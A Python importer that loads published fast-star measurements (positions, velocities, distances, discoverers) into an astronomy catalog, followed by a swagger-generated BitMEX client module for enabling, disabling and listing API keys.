catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Antonia S. Savcheva, Andrew A. West, John J. Bochanski', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:8]+' '+radec[8:11]+' '+radec[11:13]+' '+radec[13:17]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
sptype = str(row['Type'])
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, sptype[2:], source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "sd", source=source)
catalog.journal_entries()
# 2015MNRAS.447.2046H
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'hawkins2015.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).strip(' ')
oname = 'RAVE'+oname
name, source = catalog.new_entry(oname, bibcode='2015MNRAS.447.2046H')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'K. Hawkins, G. Kordopatis, G. Gilmore, T. Masseron, R. F. G. Wyse, G. Ruchti, O. Bienaymé, J. Bland-Hawthorn, C. Boeche, K. Freeman, B. K. Gibson, E. K. Grebel, A. Helmi, A. Kunder, U. Munari, J. F. Navarro, Q. A. Parker, W. A. Reid, R. D. Scholz, G. Seabroke, A. Siebert, M. Steinmetz, F. Watson, T. Zwitter', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
radec = oname.strip('RAVEJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:8]+' '+radec[8:11]+' '+radec[11:13]+' '+radec[13:15]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']).strip(' '), e_value=str(row['e_Vhel']).strip(' '), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']).strip(' '), e_value=str(row['e_pmra']).strip(' '), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']).strip(' '), e_value=str(row['e_pmdec']).strip(' '), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(float(row['Dhel'])/1e3).strip(' '), e_value=str(float(row['e_Dhel'])/1e3).strip(' '), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "g", source=source)
catalog.journal_entries()
# 2015A&A...576L..14Z
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'zeigerer.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = 'Pal'+str(row['Pal'])
name, source = catalog.new_entry(oname, bibcode='2015A&A...576L..14Z')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'E. Ziegerer, M. Volkert, U. Heber, A. Irrgang, B. T. Gänsicke, S. Geier', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.journal_entries()
# 2015ApJ...804...49B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj510826t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).strip(' ')
if oname[1]==':':
# Add the leading 0
oname = '0'+oname
oname = 'SDSSJ'+oname
name, source = catalog.new_entry(oname.replace(':',''), bibcode='2015ApJ...804...49B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Jay Anderson, Oleg Y. Gnedin, Howard E. Bond, Margaret J. Geller, Scott J. Kenyon', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, str(row['ID']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']).strip(' '), e_value=str(row['e_pmra']).strip(' '), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']).strip(' '), e_value=str(row['e_pmdec']).strip(' '), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']).strip(' '), e_value=str(row['e_Dhel']).strip(' '), u_value='kpc', source=source)
if str(row['newspec']) == 'y':
radec = oname.strip('SDSSJ')
ra, dec = radec[:11], radec[11:]
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
#catalog.entries[name].add_quantity(
# FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, str(row['Type']), source=source)
catalog.journal_entries()
# 2015RAA....15.1364L
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'li2015.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
oname = 'LAMOST'+oname
name, source = catalog.new_entry(oname, bibcode='2015RAA....15.1364L')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Yin-Bi Li, A.-Li Luo, Gang Zhao, You-Jun Lu, Peng Wei, Bing Du, Xiang Li, Yong-Heng Zhao, Zhan-Wen Han, Bo Wang, Yue Wu, Yong Zhang, Yong-Hui Hou, Yue-Fei Wang, Ming Yang', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
radec = oname.strip('LAMOSTJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, 'Li'+str(row['ID']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'F', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'G', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'K', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2015AJ....150...77V
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'vickers2015final.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
oname = 'SDSS'+oname
name, source = catalog.new_entry(oname, bibcode='2015AJ....150...77V')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
        catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'John J. Vickers, Martin C. Smith, Eva K. Grebel', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
if str(row['distance']) != '':
catalog.entries[name].add_quantity(
                FASTSTARS.LUM_DIST, str(row['distance']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'F', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'G', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'K', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'M', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2015ApJ...813...26F
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'favia2015.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
oname = 'SDSS'+oname
name, source = catalog.new_entry(oname, bibcode='2015ApJ...813...26F')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Andrej Favia, Andrew A. West, Christopher A. Theissen', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, 'RdM'+str(row['ID']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra1']), e_value=str(row['e_pmra1']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec1']), e_value=str(row['e_pmdec1']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(float(row['Dhel'])/1e3), e_value=str(float(row['e_Dhel'])/1e3), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'M'+str(row['Type']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2017ApJ...847L...9H
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'huang2017.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
name, source = catalog.new_entry(oname, bibcode='2017ApJ...847L...9H')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Y. Huang, X.-W. Liu, H.-W. Zhang, B.-Q. Chen, M.-S. Xiang, C. Wang, H.-B. Yuan, Z.-J. Tian, Y.-B. Li, B. Wang', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2017), source)
radec = oname.strip('J')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, str(row['Alias']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
sptype = str(row['Type'])
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, sptype[:2], source=source)
lumclass = sptype[2:].split('/')
for LC in lumclass:
if LC == "IV":
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'sg', source=source)
elif LC == "V":
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
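    # Note: from this task onward the entries are flushed only by the single
    # catalog.journal_entries() call at the end, rather than after each
    # dataset as in the blocks above.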
# 2017MNRAS.470.1388M
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'marchetti2017.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = 'TYC '+str(row['Tycho 2 ID']).strip(' ')
name, source = catalog.new_entry(oname, bibcode='2017MNRAS.470.1388M')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'T. Marchetti, E. M. Rossi, G. Kordopatis, A. G. A. Brown, A. Rimoldi, E. Starkenburg, K. Youakim, R. Ashley', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2017), source)
sourcegaia = catalog.entries[name].add_source(bibcode='2016A&A...595A...2G')
radec = str(row['RADEC'])
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=sourcegaia)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=sourcegaia)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['HRV']), e_value=str(row['e_HRV']), source=source)
#catalog.entries[name].add_quantity(
# FASTSTARS.LUM_DIST, str(float(str(row['d']))/1e3), e_lower_value=str(float(str(row['e_low_d']))/1e3), e_upper_value=str(float(str(row['e_upp_d']))/1e3), u_value='kpc', source=source)
if str(row['dspec'])!='--':
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(float(str(row['dspec']))/1e3), e_value=str(float(str(row['e_dspec']))/1e3), u_value='kpc', source=source)
sptype = str(row['SpectralType'])
if sptype != '--':
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, sptype, source=source)
stellarclass = str(row['StellarClass']).split('/')
if str(row['StellarClass'])!='--':
for SC in stellarclass:
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, SC, source=source)
# 2018arXiv180410607M
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'marchetti2018.txt')
data = read(datafile)
for row in pbar(data, task_str):
oname = 'Gaia DR2 '+str(row['source_id']).strip()[:6]
name, source = catalog.new_entry(oname, bibcode='2018arXiv180410607M')
lname = 'Gaia DR2 '+str(row['source_id']).strip()
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lname, source=source)
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'T. Marchetti, E. M. Rossi, A. G. A. Brown', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2018), source)
#sourcegaia = catalog.entries[name].add_source(bibcode='2016A&A...595A...2G')
ra, dec = coord(ra=float(row['ra'])*u.deg,dec=float(row['dec'])*u.deg,frame='icrs').to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
# 2018arXiv180503194H
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','hattori2018.csv')
data = read(datafile)
for row in pbar(data, task_str):
oname = str(row['ID']).strip(' ')
name, source = catalog.new_entry(oname, bibcode='2018arXiv180503194H')
lgname = 'Gaia DR2 '+str(row['GaiaDR2']).strip(' ')
sgname = 'Gaia DR2 '+str(row['GaiaDR2']).strip(' ')[:6]
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lgname, source=source)
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, sgname, source=source)
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Kohei Hattori, Monica Valluri, Eric F. Bell, Ian U. Roederer', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2018), source)
# 2018arXiv180608630I
### Has teff, mass, logg, radii, etc.
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','irrgang2018.csv')
data = read(datafile)
for row in pbar(data, task_str):
oname = str(row['id'])
name, source = catalog.new_entry(oname, bibcode='2018arXiv180608630I')
alias = str(row['catalog'])
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, alias, source=source)
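        # The 2.576 divisor below presumably rescales 99% confidence
        # half-widths to 1-sigma (the two-sided z-value at 99% is ~2.576);
        # this is an inference from the magic number, not stated in the data.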
catalog.entries[name].add_quantity(FASTSTARS.VELOCITY, str(row['vrad']), e_lower_value=str(row['e_vrad_low']/2.576), e_upper_value=str(row['e_vrad_upp']/2.576), source=source, u_value='km/s')
catalog.entries[name].add_quantity(FASTSTARS.LUM_DIST, str(row['dist']), e_lower_value=str(row['e_dist_low_1sig']), e_upper_value=str(row['e_dist_upp_1sig']), source=source, u_value='kpc')
# 2017MNRAS.466.3077M
### Has teff, logg, some abundances
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','bidin2016.csv')
data = read(datafile)
for row in pbar(data, task_str):
# disable this when LMC potential is in.
if str(row['shortid']) in ['390','403']:
oname = 'MoniBidin'+str(row['shortid'])
name, source = catalog.new_entry(oname, bibcode='2017MNRAS.466.3077M')
sourcedinescu = catalog.entries[name].add_source(bibcode='2018arXiv180702028C')
lgname = 'Gaia DR2 '+str(row['gaiadr2']).strip(' ')
sgname = 'Gaia DR2 '+str(row['gaiadr2']).strip(' ')[:6]
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lgname, source=sourcedinescu)
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, sgname, source=sourcedinescu)
catalog.entries[name].add_quantity(FASTSTARS.VELOCITY, str(row['rv']), e_value=str(row['rv_error']), source=source, u_value='km/s')
catalog.entries[name].add_quantity(FASTSTARS.LUM_DIST, str(row['dist']), e_lower_value=str(row['dist_error_low']), e_upper_value=str(row['dist_error_high']), source=source, u_value='kpc')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'C. Moni Bidin, D. I. Casetti-Dinescu, T. M. Girard, L. Zhang, R. A. Méndez, K. Vieira, V. I. Korchagin, W. F. van Altena', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2018), source)
# 2018arXiv180700427D
### Has teff, logg, some abundances
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','du2018.csv')
data = read(datafile)
for row in pbar(data, task_str):
oname = str(row['name'])
name, source = catalog.new_entry(oname, bibcode='2018arXiv180700427D')
lgname = 'Gaia DR1 '+str(row['source_id']).strip(' ')
sgname = 'Gaia DR1 '+str(row['source_id']).strip(' ')[:6]
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lgname, source=source)
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, sgname, source=source)
catalog.entries[name].add_quantity(FASTSTARS.VELOCITY, str(row['hrv']), e_value=str(row['hrv_error']), source=source, u_value='km/s')
catalog.entries[name].add_quantity(FASTSTARS.LUM_DIST, str(float(row['dhel'])/1e3), e_value=str(float(row['dhel_error'])/1e3), source=source, u_value='kpc')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Cuihua Du, Hefan Li, Shuai Liu, Thomas Donlon, Heidi Jo Newberg', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2018), source)
# 2018arXiv180802620B
### Has teff, mass, logg, radii, etc.
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','bromley2018.csv')
data = read(datafile)
for row in pbar(data, task_str):
oname = str(row['GaiaDR2ID'])
lgname = 'Gaia DR2 '+str(row['GaiaDR2ID'])
sgname = 'Gaia DR2 '+str(row['GaiaDR2ID'])[:6]
name, source = catalog.new_entry(sgname, bibcode='2018arXiv180802620B')
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lgname, source=source)
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Benjamin C. Bromley, Scott J. Kenyon, Warren R. Brown, Margaret J. Geller', source)
catalog.journal_entries()
return
--- record: bitmex_swagger/api/api_key_api.py | silencewwt/bitmex-swagger-client @ 01403685 | MIT | 22,756 bytes | 1 star ---
# coding: utf-8
"""
BitMEX API
## REST API for the BitMEX Trading Platform [View Changelog](/app/apiChangelog) ---- #### Getting Started Base URI: [https://www.bitmex.com/api/v1](/api/v1) ##### Fetching Data All REST endpoints are documented below. You can try out any query right from this interface. Most table queries accept `count`, `start`, and `reverse` params. Set `reverse=true` to get rows newest-first. Additional documentation regarding filters, timestamps, and authentication is available in [the main API documentation](/app/restAPI). *All* table data is available via the [Websocket](/app/wsAPI). We highly recommend using the socket if you want to have the quickest possible data without being subject to ratelimits. ##### Return Types By default, all data is returned as JSON. Send `?_format=csv` to get CSV data or `?_format=xml` to get XML data. ##### Trade Data Queries *This is only a small subset of what is available, to get you started.* Fill in the parameters and click the `Try it out!` button to try any of these queries. * [Pricing Data](#!/Quote/Quote_get) * [Trade Data](#!/Trade/Trade_get) * [OrderBook Data](#!/OrderBook/OrderBook_getL2) * [Settlement Data](#!/Settlement/Settlement_get) * [Exchange Statistics](#!/Stats/Stats_history) Every function of the BitMEX.com platform is exposed here and documented. Many more functions are available. ##### Swagger Specification [⇩ Download Swagger JSON](swagger.json) ---- ## All API Endpoints Click to expand a section. # noqa: E501
OpenAPI spec version: 1.2.0
Contact: support@bitmex.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from bitmex_swagger.api_client import ApiClient
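# NOTE: this generated client passes `async` as a keyword argument throughout.
# `async` became a reserved word in Python 3.7, so this module only imports on
# Python <= 3.6; later swagger-codegen releases renamed the flag to `async_req`.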
class APIKeyApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
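    # A minimal usage sketch (hypothetical values; per the docstrings below,
    # the async path returns a thread whose .get() yields the result):
    #
    #     api = APIKeyApi()
    #     keys = api.a_pi_key_get(reverse=True)   # synchronous
    #     thread = api.a_pi_key_get(async=True)   # asynchronous
    #     keys = thread.get()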
def a_pi_key_disable(self, api_key_id, **kwargs): # noqa: E501
"""Disable an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_disable(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_disable_with_http_info(api_key_id, **kwargs) # noqa: E501
else:
(data) = self.a_pi_key_disable_with_http_info(api_key_id, **kwargs) # noqa: E501
return data
def a_pi_key_disable_with_http_info(self, api_key_id, **kwargs): # noqa: E501
"""Disable an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_disable_with_http_info(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_disable" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `a_pi_key_disable`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'api_key_id' in params:
form_params.append(('apiKeyID', params['api_key_id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey/disable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APIKey', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def a_pi_key_enable(self, api_key_id, **kwargs): # noqa: E501
"""Enable an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_enable(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_enable_with_http_info(api_key_id, **kwargs) # noqa: E501
else:
(data) = self.a_pi_key_enable_with_http_info(api_key_id, **kwargs) # noqa: E501
return data
def a_pi_key_enable_with_http_info(self, api_key_id, **kwargs): # noqa: E501
"""Enable an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_enable_with_http_info(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_enable" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `a_pi_key_enable`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'api_key_id' in params:
form_params.append(('apiKeyID', params['api_key_id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey/enable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APIKey', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def a_pi_key_get(self, **kwargs): # noqa: E501
"""Get your API Keys. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_get(async=True)
>>> result = thread.get()
:param async bool
:param bool reverse: If true, will sort results newest first.
:return: list[APIKey]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.a_pi_key_get_with_http_info(**kwargs) # noqa: E501
return data
